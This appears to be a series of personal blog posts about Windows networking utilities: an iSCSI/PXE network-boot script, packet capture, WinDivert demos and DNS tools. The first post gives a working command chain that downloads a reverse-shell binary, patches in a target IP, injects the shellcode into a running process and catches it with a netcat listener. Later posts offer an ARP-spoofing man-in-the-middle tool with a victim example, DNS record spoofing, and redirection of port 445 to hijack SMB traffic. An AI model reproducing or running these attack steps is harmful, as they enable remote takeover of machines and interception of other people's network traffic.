Juil 312023
 

NTHASH-win64 /download2hexa /input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 /replace /old:7F000001 /new:C0A801BE|nthash-win64 /injectcodehexa /pid:996

The above will, in 3 steps :

-download a binary and convert it to its textual hexa form

-replace the default outbound ip (127.0.0.1) to the real target ip (here 192.168.1.190)

-inject the shellcode into the memory of the specified pid and execute it

on the remote host : run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shell code)

Sep 042022
 

A while ago, we have seen here how we could play with vhd differencing disks and starwind san free product.

However, the poor scripting capabilities of starwind san free associated with a strict licensing model renders this solution dodgy.

Today lets see how we achieve a better solution with powershell and windows iscsi target capabilities.

First lest have at the script below : all it does is create an iscsi target for the incoming requests if the target does not exist yet thus enabling one to boot many client devices from one unique parent/master.

Note : creating your master image (i.e a windows that can boot over the network using iscsi is not in scope here).


write-host "#!ipxe"
write-host "clear net0.dhcp/gateway:ipv4"
write-host "set gateway 0.0.0.0"
write-host "set initiator-iqn iqn.2006-11.1"
write-host "set keep-san 1"
#if pxesrv is running on the isci target, use ${next-server} instead of harcoded ip
write-host 'set target ${next-server}'
#
$TargetName = $args[0]
write-host "echo TargetName: "$TargetName
$vhdpath = "C:\_images\" + $args[0] + ".vhd"
write-host "echo vhdpath: "$vhdpath
$iqn ="iqn.1991-05.com.microsoft:"+$TargetName
write-host "echo iqn: "$iqn
if (-not(Test-Path -Path $vhdpath -PathType Leaf)) {
$parent = "c:\_images\iscsi.vhd"
#$result=New-VHD -ParentPath $parent -Path $vhdpath -Differencing -Confirm:$false
$result=c:\temp\vmount.exe createchildvhd $vhdpath $parent
$result=Import-IscsiVirtualDisk -Path $vhdpath
$result=New-IscsiServerTarget -TargetName $TargetName -InitiatorIds "iqn:iqn.2006-11.1"
#option : Set-IscsiServerTarget -TargetName "child1" -InitiatorId "IQN:*"
$result=Set-IscsiServerTarget -TargetName $TargetName -TargetIqn $iqn
$result=Add-IscsiVirtualDiskTargetMapping -TargetName $TargetName -DevicePath $vhdpath
write-host "echo iscsi target configured, enjoy !"
}
#
write-host $('sanboot --keep iscsi:${target}:tcp:3260:0:' + $iqn)

Lets first run tiny pxe server (as admin since we will be calling some low level powershell scripts) and lets call our powershell script from a remote device like this : http://192.168.1.147/iscsi.ps1?aa-bb-cc-dd-ee-ff (replace the ip with whatever your iscsi target is).

You should get a result like this in your browser:


#!ipxe
clear net0.dhcp/gateway:ipv4
set gateway 0.0.0.0
set initiator-iqn iqn.2006-11.1
set keep-san 1
set target ${next-server}
echo TargetName:  aa-bb-cc-dd-ee-ff
echo vhdpath:  C:\_images\aa-bb-cc-dd-ee-ff.vhd
echo iqn:  iqn.1991-05.com.microsoft:aa-bb-cc-dd-ee-ff
echo iscsi target configured, enjoy !
sanboot --keep iscsi:${target}:tcp:3260:0:iqn.1991-05.com.microsoft:aa-bb-cc-dd-ee-ff

And your iscsi target should look like this :

You are now ready to boot your devices by setting your second stage bootloader in TPS like this : http://@opt54/iscsi.ps1?@mac .

Every pxe boot device will get a new image if it dos not exist yet or will boot from its image if it exists.

side notes:

-when cloning an existing system to iscsi, you may want to disable LWF (browse to \SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}, identify your nic,
and remove any line containing {B70D6460-3635-4D42-B866-B8AB1A24454C})

-when installing a new system to iscsi, you may want to disable PagingFiles (browse to \SYSTEM\ControlSet001\Control\Session Manager\Memory Management and clear the string « PagingFiles ») – tip here, use setup.exe /noreboot from winpe and then use regedit to open your \windows\system32\config\system hive.

Fév 242019
 

A few days ago, I have shared a, command line, layer 3 network sniffer based on windivert (netdump here).

The command line version offers a few options like capture or not, choose the network layer or the forward layer, etc …

Thus, sometimes it is also nice to have a simple(« start/stop ») GUI.
Now done.
Source code and binaries here on github as usual…
This version will automatically save the capture to a dated pcap file.

https://imgur.com/nLQJnRl.png

Fév 242019
 

An interesting article about how to perform a network capture when no tools are installed locally.

Here.

In short, example :

1-netsh trace start capture=yes Ethernet.Type=IPv4 IPv4.Address=157.59.136.1

2-netsh trace stop

3-get your capture in %userprofile%\AppData\Local\Temp\NetTraces\NetTrace.etl
-open with Microsoft’s Message Analyzer app
or
-convert it with

$s = New-PefTraceSession -Path “C:\output\path\spec\OutFile.Cap” -SaveOnStop
$s | Add-PefMessageProvider -Provider “C:\input\path\spec\Input.etl”
$s | Start-PefTraceSession

Fév 232019
 

Lets play with Winpcap.

Quoting the winpcap web site : « WinPcap consists of a driver that extends the operating system to provide low-level network access and a library that is used to easily access low-level network layers ».

Lets use it to perform a quick and easy man-in-the-middle-attack with arp spoofing.

Quoting wikipedia : « a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other ».

Source code and binaries are available here.

Usage is:
arpspoof 1.0 by erwan2212@gmail.com
arpspoof list-interfaces
arpspoof interface-index ip1 ip2

Example:
arpspoof.exe 0 192.168.1.125 192.168.1.250
arpspoof 1.0 by erwan2212@gmail.com
arpspoof list-interfaces
arpspoof interface-index ip1 ip2
ip1:192.168.1.125 mac1:001DE0-567737
ip2:192.168.1.250 mac2:C05627-B7FD32
spoofed mac:94DE80-C2A41E
sending packets…press a key to stop…

192.168.1.125 is victim (a computer on my network).
192.168.1.250 is my network gateway/router on my network.
94DE80-C2A41E is my mac address (i.e the attacker mac address).

192.168.1.125 will believe that mac address of the router (192.168.1.250) is mine i.e 94DE80-C2A41E.
192.168.1.250 will believe that mac address of the victim (192.168.1.125) is mine i.e 94DE80-C2A41E.
In effect all traffic between these 2 hosts will go thru my computer.

One important thing not to forget : enable forwarding on your computer or else all traffic between these 2 hosts will be dropped.
How? easy :
-check your interfaces : netsh interface ipv4 show interfaces
-enable forwarding on the desired interface : netsh interface ipv4 set interface x forwarding= »enabled »

Now you can perform an attack with intercept-dns from a previous article (dont forget to do a set layer=forward on the command line then).
Or simply sniff/capture the traffic with netdump.

Note that you could also use a GUI like Iptools to perform arpspoof.
See example screenshot here (C=client/victim, R=router).

Fév 182019
 

Playing around with intercepting traffic (diverting, mitm, etc), I needed a standalone DNS server.

Sharing it here.

You can use the local windows resolver OR use dnsquery which then allows you to choose between UDP/TCP and remote DNS server.
Remote dns server has to be set in the config.ini file (see included ini file).
Still via the config.ini, you also « spoof » A or PTR records (example : have www.facebook.com resolve to 127.0.0.1).

https://i.imgur.com/zSqyGvy.png

Fév 032019
 

Still playing with Windivert (see original article here), I this time decided to code a transparent proxy.

Principle is the following : divert a destination port (say tcp:80) to a new destination_ip:port.

On the destination ip, i am running privoxy (but any proxy supporting transparent mode would do).
In privoxy config file, I am setting accept-intercepted-requests=1 .

This will be completely transparent for the source application.

Nothing really fancy in the code except may be me storing the orginal remote ip (which we will need to re apply on the traffic back) in an array dynamic_source_port=remote_ip.

Source code and binaries can be found here.

Jan 272019
 

In a previous article, I did comment on a nice opensource library (Windivert) and shared a basic freepascal demo to use it.

This time I used this library to redirect (or reuse) a local port used by another application or service to another local port.

It could be handy to fool firewalls or to hijack traffic going to a service.

One of the best example that come to my mind is to redirect local port 445 to a an application/shell of your own listening on local port 1337.
Something you could not achieve like netsh port redirect as the port is already in use and/or used by a kernel service (SMB in our case).

The command line would then be tcpredir 445 1337.

Source code and binaries on Github.

One possible application example:

-divert local port 445 to port 1337
-set up a smb server on port 1337

https://i.imgur.com/kSCrC9M.png

Jan 272019
 

Quoting the original web site (here) :

Windows Packet Divert (WinDivert) is a user-mode packet capture-and-divert package for Windows 2008, Windows 7, Windows 8, Windows 10 and Windows 2016.

WinDivert allows user-mode applications to capture/modify/drop network packets sent to/from the Windows network stack. In summary, WinDivert can:

capture network packets
filter/drop network packets
sniff network packets
(re)inject network packets
modify network packets
WinDivert can be used to implement user-mode packet filters, packet sniffers, firewalls, NAT, VPNs, tunneling applications, etc.

The main features of WinDivert include:

packet interception, sniffing, or dropping modes
supports loopback (localhost) traffic
full IPv6 support
network layer
simple yet powerful API
high-level filtering language
filter priorities
silent installation
freely available under the terms of the GNU Lesser General Public License (LGPL)

Similar to the raw socket sniffer (here), i have shared a demo (in freepascal) here.

Because windivert is a kernel driver, issues inherent to the windows raw sockets will not apply here.

Jan 062019
 

A slight update to previous version.

Syntax now is


dnsping 0.6 by erwan2212@gmail.com
usage: dnsping query nameserver query
usage: dnsping query nameserver query delay_seconds
usage: dnsping cache
usage: dnsping flush
usage: dnsping add nameserver hostname ip
usage: dnsping delete nameserver hostname ip

Additions are : cache & flush, add & delete (against a MS DNS server).

Download here.

Source code is here.